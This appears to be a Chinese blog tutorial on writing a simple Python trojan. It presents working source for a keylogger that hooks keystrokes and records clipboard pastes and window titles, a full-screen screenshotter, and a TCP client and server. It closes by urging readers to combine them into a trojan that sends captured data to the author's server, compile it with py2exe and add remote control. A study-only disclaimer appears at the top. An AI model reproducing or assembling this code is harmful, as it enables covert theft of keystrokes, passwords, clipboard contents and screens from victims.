python编写木马攻击_Python编写简易木马程序
Python编写简易木马程序
0x00 准备
文章内容仅供学习研究、切勿用于非法用途!
这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413
首先准备好我们需要的依赖库,python hook和pythoncom。
下载安装python hook
下载安装pythoncom模块:
http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/pywin32-219.win32-py2.7.exe/download
如果觉得麻烦,你可以直接使用集成了所有我们所需要的python库的商业版Activepython(我们可以用他的免费版):
http://www.activestate.com/activepython
0x01 键盘记录器
说起Keylogger,大家的思维可能早已飞向带有wifi功能的mini小硬件去了。抛开高科技,我们暂且回归本质,探探简易键盘记录器的原理与实现。
Python keylogger键盘记录的功能的实现主要利用了pythoncom及pythonhook,然后就是对windows API的各种调用。Python之所以用起来方便快捷,主要归功于这些庞大的支持库,正所谓“人生苦短,快用Python”。
代码部分:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
# -*- coding: utf-8 -*-
from
ctypesimport
*
import
pythoncom
import
pyHook
import
win32clipboard
user32= windll.user32
kernel32= windll.kernel32
psapi= windll.psapi
current_window= None
#
def
get_current_process():
# 获取最上层的窗口句柄
hwnd= user32.GetForegroundWindow()
# 获取进程ID
pid= c_ulong(0)
user32.GetWindowThreadProcessId(hwnd,byref(pid))
# 将进程ID存入变量中
process_id= "%d" % pid.value
# 申请内存
executable= create_string_buffer("\x00"*512)
h_process= kernel32.OpenProcess(0x400 |0x10,False,pid)
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
# 读取窗口标题
windows_title= create_string_buffer("\x00"*512)
length= user32.GetWindowTextA(hwnd,byref(windows_title),512)
# 打印
"[ PID:%s-%s-%s]" % (process_id,executable.value,windows_title.value)
# 关闭handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
# 定义击键监听事件函数
def
KeyStroke(event):
global
current_window
# 检测目标窗口是否转移(换了其他窗口就监听新的窗口)
if
event.WindowName !=
current_window:
current_window= event.WindowName
# 函数调用
get_current_process()
# 检测击键是否常规按键(非组合键等)
if
event.Ascii >32
and event.Ascii <127:
chr(event.Ascii),
else:
# 如果发现Ctrl+v(粘贴)事件,就把粘贴板内容记录下来
if
event.Key==
"V":
win32clipboard.OpenClipboard()
pasted_value= win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
"[PASTE]-%s" % (pasted_value),
else:
"[%s]" % event.Key,
# 循环监听下一个击键事件
return
True
# 创建并注册hook管理器
kl= pyHook.HookManager()
kl.KeyDown= KeyStroke
# 注册hook并执行
kl.HookKeyboard()
pythoncom.PumpMessages()
【知识点】钩子(Hook):Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。
撸代码时一定要注意严格区分大小写。检查无误后启动keylogger:
然后可以尝试打开记事本写点东西,过程中可以看到我们的keylogger窗口正在对我们的输入实时记录:
切换窗口时会自动跟踪到新窗口(众:这点功能都没有还敢叫keylogger吗!),light教授趁机骚扰一下疯狗,可以看到我们的keylogger已经跟踪到QQ聊天窗口,并忠实的记录下我输入的一切。
0x02 看看你在干什么:编写一个screenshotter
截屏实现起来更简单,直接调用几个gui相关的api即可,我们直接看代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# -*- coding: utf-8 -*-
import
win32gui
import
win32ui
import
win32con
import
win32api
# 获取桌面
hdesktop= win32gui.GetDesktopWindow()
# 分辨率适应
width= win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height= win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left= win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top= win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
# 创建设备描述表
desktop_dc= win32gui.GetWindowDC(hdesktop)
img_dc= win32ui.CreateDCFromHandle(desktop_dc)
# 创建一个内存设备描述表
mem_dc= img_dc.CreateCompatibleDC()
# 创建位图对象
screenshot= win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)
# 截图至内存设备描述表
mem_dc.BitBlt((0,0), (width, height), img_dc, (left, top), win32con.SRCCOPY)
# 将截图保存到文件中
screenshot.SaveBitmapFile(mem_dc,'c:\\WINDOWS\\Temp\\screenshot.bmp')
# 内存释放
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())
看看效果如何:
0x03 综合运用:完成一个简易木马
无论是keylogger记录下的内容,还是screenshotter截获的图片,只存在客户端是没有太大意义的,我们需要构建一个简单server和client端来进行通信,传输记录下的内容到我们的服务器上。
编写一个简单的TCPclient
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# -*- coding: utf-8 -*-
import
socket
# 目标地址IP/URL及端口
target_host= "127.0.0.1"
target_port= 9999
# 创建一个socket对象
client= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# 连接主机
client.connect((target_host,target_port))
# 发送数据
client.send("GET / HTTP/1.1\r\nHOST:127.0.0.1\r\n\r\n")
# 接收响应
response= client.recv(4096)
response
编写一个简单的TCPserver
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# -*- coding: utf-8 -*-
import
socket
import
threading
# 监听的IP及端口
bind_ip= "127.0.0.1"
bind_port= 9999
server= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
"[*] Listening on %s:%d" % (bind_ip,bind_port)
def
handle_client(client_socket):
request= client_socket.recv(1024)
"[*] Received:%s" % request
client_socket.send("ok!")
client_socket.close()
while
True:
client,addr= server.accept()
"[*] Accept connection from:%s:%d" % (addr[0],addr[1])
client_handler= threading.Thread(target=handle_client,args=(client,))
client_handler.start()
开启服务端监听:
客户端执行:
服务端接收到客户端的请求并作出响应:
0x04 结语
最后,你需要做的就是把上面三个模块结合起来,一个简易的具有键盘记录、屏幕截图并可以发送内容到我们服务端的木马就完成了。可以使用py2exe把脚本生成exe可执行文件。当然你还可以继续发挥,加上远程控制功能。Py2exe用法可以参考这里:
http://www.py2exe.org/index.cgi/Tutorial
Enjoy coding~
参考文档:
《Black Hat Python》 https://www.google.com https://www.python.org/ http://www.py2exe.org
python编写木马攻击_Python编写简易木马程序相关推荐
- python实现tcp通信_Python实现简易TCP通信程序
TCP简介 传输控制协议(TCP,Transmission Control Protocol)是一种面向连接的.可靠的.基于字节流的传输层通信协议. TCP旨在适应支持多网络应用的分层协议层次结构. ...
- python实现dos攻击_python 实现DoS攻击
python 实现DoS攻击 2020-07-30 03:12 阅读数 6 前言 一 狗店老板欺负我女神,作为一个程序员这如果都能忍那还算男人?得知这个狗店老板买狗网站后果断决定黑了他,看他嚣张不嚣张 ...
- python模拟ddos攻击_python版DDOS攻击脚本
本文实例为大家分享了python版DDOS攻击脚本,供大家参考,具体内容如下 于是就找到了我之前收藏的一篇python的文章,是关于ddos攻击的一个脚本,正好今天有空,就实践下了. 附上源码pyDd ...
- python递归算法案例教案_Python电子教案2-1-Python程序实例解析.ppt
Python电子教案2-1-Python程序实例解析.ppt 简单说,eval()的作用是将输入的字符串内容变成Python语句,并执行这个语句.实例代码1.1使用eval()函数将用户的部分输入(T ...
- python 全部缩进一行_Python成为专业人士笔记–程序行空白及tab缩进的作用
"专业人士笔记"系列目录: 创帆云:Python成为专业人士笔记--强烈建议收藏!每日持续更新!zhuanlan.zhihu.com python中的空白tab缩进 Python ...
- python聊天软件实现_python实现点对点聊天程序
用Python实现点对点的聊天,2个程序,一个是client.py,一个是server.py,通过本机地址127.0.0.1连接进行通信,利用多线程把发送消息和接收消息分开独立进行. client代码 ...
- python编写木马攻击_python实现一个简单木马!
一个简单的木马程序 绝大多数的木马程序都是基于Socket来实现的 废话少说直接上代码! 代码: client部分: # -*- coding: UTF-8 -*- import socket imp ...
- python模拟发红包_Python编写简易发红包程序
1.固定人数抢红包 import random money = 100 for i in range(1,10):#限制人数 a = random.randint(1,10)#随机生成1到10元 mo ...
- python编写脚本教程_python编写一个会算账的脚本的示例代码
python算账脚本 1.假如小明卡里有10000元去商场买东西发现钱不够又向父母借了5000账单如下 2.以下脚本就能实现上面的运算 from time import strftime import ...
最新文章
- python pandas for循环_python – 将一个for循环应用于Pandas中的多个DataFrame
- 【内有网易黑猪肉券福利】网易MCTalk首秀——在线教育是一场马拉松
- curl 慢 不稳定_Node.js VM 不完全指北
- spring框架搭建第二天
- C#与时间有关的一些方法
- Effective Java之谨慎地覆盖clone(十一)
- CNN(Convolutional Neural Network) 的基础
- Unity脚本各种[XXX]的用法
- nullnullProcessing Bitmaps Off the UI Thread 处理来自UI线程的位图
- 超详细 | 接口自动化测试总结与分享入门篇
- Python+Flask+MysqL的web建设技术过程
- (六)Graphics基本应用
- 计算机网络 层次路由,计算机网络-网络层(5)层次路由
- Scala 高阶函数(作为值的函数、匿名函数、闭包、柯里化)+隐式转换和隐式参数...
- 【记录】那些很实用的Nginx规则
- 栈 java 什么意思_java stack什么意思
- 211工科计算机专业大学排名,这所211大学曾痛失985资格,工科专业实力强劲
- 麦子:我奋斗了18年才和你坐在一起喝咖啡
- Microsoft Visual Studio C++2022 Windows 11 SDK环境
- 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)
热门文章
- python多元函数求解_使用遗传算法求二元函数的最小值
- 企业文件加密系统 — 文件透明加密的优势和功能
- matlab绘制布尔运算图,干货丨最全的布尔运算制作小图标教程!
- 设计模式:(中介者模式)
- 无线ap安全dhcp服务器,AC+AP时代——办公区内满足安全性又够人性化的WiFi漫游设置攻略...
- java对接钉钉发送消息通知
- Pytorch学习记录(七):自定义模型 Auto-Encoders 使用numpy实现BP神经网络
- 对教材-人工智能导论的不同看法
- 深度学习之编程语言Python(Ⅰ)
- zoho邮箱收费和免费区别_集成MS Office和您的Zoho在线帐户